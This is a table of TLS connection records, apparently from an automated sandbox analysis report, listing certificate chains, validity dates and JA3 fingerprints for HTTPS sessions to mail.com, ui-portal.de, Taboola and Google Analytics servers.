Jul 6, 2021 14:29:45.703183889 CEST	151.101.1.44	443	192.168.2.4	49767	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.703183889 CEST	151.101.1.44	443	192.168.2.4	49767	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.584393978 CEST	82.165.229.87	443	192.168.2.4	49809	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.584393978 CEST	82.165.229.87	443	192.168.2.4	49809	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.831079006 CEST	82.165.229.59	443	192.168.2.4	49810	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.831079006 CEST	82.165.229.59	443	192.168.2.4	49810	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.834745884 CEST	82.165.229.59	443	192.168.2.4	49811	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:25.834745884 CEST	82.165.229.59	443	192.168.2.4	49811	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:27.416193008 CEST	82.165.229.16	443	192.168.2.4	49821	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:27.416193008 CEST	82.165.229.16	443	192.168.2.4	49821	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:27.417283058 CEST	82.165.229.16	443	192.168.2.4	49822	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:27.417283058 CEST	82.165.229.16	443	192.168.2.4	49822	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:28.481940031 CEST	195.20.250.115	443	192.168.2.4	49826	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:28.481940031 CEST	195.20.250.115	443	192.168.2.4	49826	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:28.481997013 CEST	195.20.250.115	443	192.168.2.4	49827	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:28.481997013 CEST	195.20.250.115	443	192.168.2.4	49827	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.219235897 CEST	82.165.229.87	443	192.168.2.4	49837	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.219235897 CEST	82.165.229.87	443	192.168.2.4	49837	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.219306946 CEST	82.165.229.87	443	192.168.2.4	49836	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.219306946 CEST	82.165.229.87	443	192.168.2.4	49836	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.497968912 CEST	82.165.229.59	443	192.168.2.4	49839	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.497968912 CEST	82.165.229.59	443	192.168.2.4	49839	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.498179913 CEST	82.165.229.59	443	192.168.2.4	49838	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.498179913 CEST	82.165.229.59	443	192.168.2.4	49838	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.985919952 CEST	142.250.180.206	443	192.168.2.4	49845	CN=*.google-analytics.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Mon Jun 07 03:34:32 CEST 2021 Thu Jun 15 02:00:42 CEST 2017	Mon Aug 30 03:34:31 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:37.985919952 CEST	142.250.180.206	443	192.168.2.4	49845	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.009654999 CEST	142.250.180.206	443	192.168.2.4	49846	CN=*.google-analytics.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Mon Jun 07 03:34:32 CEST 2021 Thu Jun 15 02:00:42 CEST 2017	Mon Aug 30 03:34:31 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.009654999 CEST	142.250.180.206	443	192.168.2.4	49846	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.613174915 CEST	82.165.229.54	443	192.168.2.4	49849	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.613174915 CEST	82.165.229.54	443	192.168.2.4	49849	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.613558054 CEST	82.165.229.54	443	192.168.2.4	49850	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.613558054 CEST	82.165.229.54	443	192.168.2.4	49850	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.679313898 CEST	82.165.229.16	443	192.168.2.4	49851	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.679313898 CEST	82.165.229.16	443	192.168.2.4	49851	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.688683033 CEST	82.165.229.16	443	192.168.2.4	49852	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:38.688683033 CEST	82.165.229.16	443	192.168.2.4	49852	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.122517109 CEST	82.165.229.87	443	192.168.2.4	49858	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.122517109 CEST	82.165.229.87	443	192.168.2.4	49858	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.134078979 CEST	82.165.229.87	443	192.168.2.4	49859	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.134078979 CEST	82.165.229.87	443	192.168.2.4	49859	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.550509930 CEST	82.165.229.59	443	192.168.2.4	49860	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.550509930 CEST	82.165.229.59	443	192.168.2.4	49860	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.550991058 CEST	82.165.229.59	443	192.168.2.4	49861	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:42.550991058 CEST	82.165.229.59	443	192.168.2.4	49861	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.075454950 CEST	82.165.229.16	443	192.168.2.4	49863	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.075454950 CEST	82.165.229.16	443	192.168.2.4	49863	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.078349113 CEST	82.165.229.16	443	192.168.2.4	49862	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.078349113 CEST	82.165.229.16	443	192.168.2.4	49862	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.090290070 CEST	82.165.229.54	443	192.168.2.4	49864	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
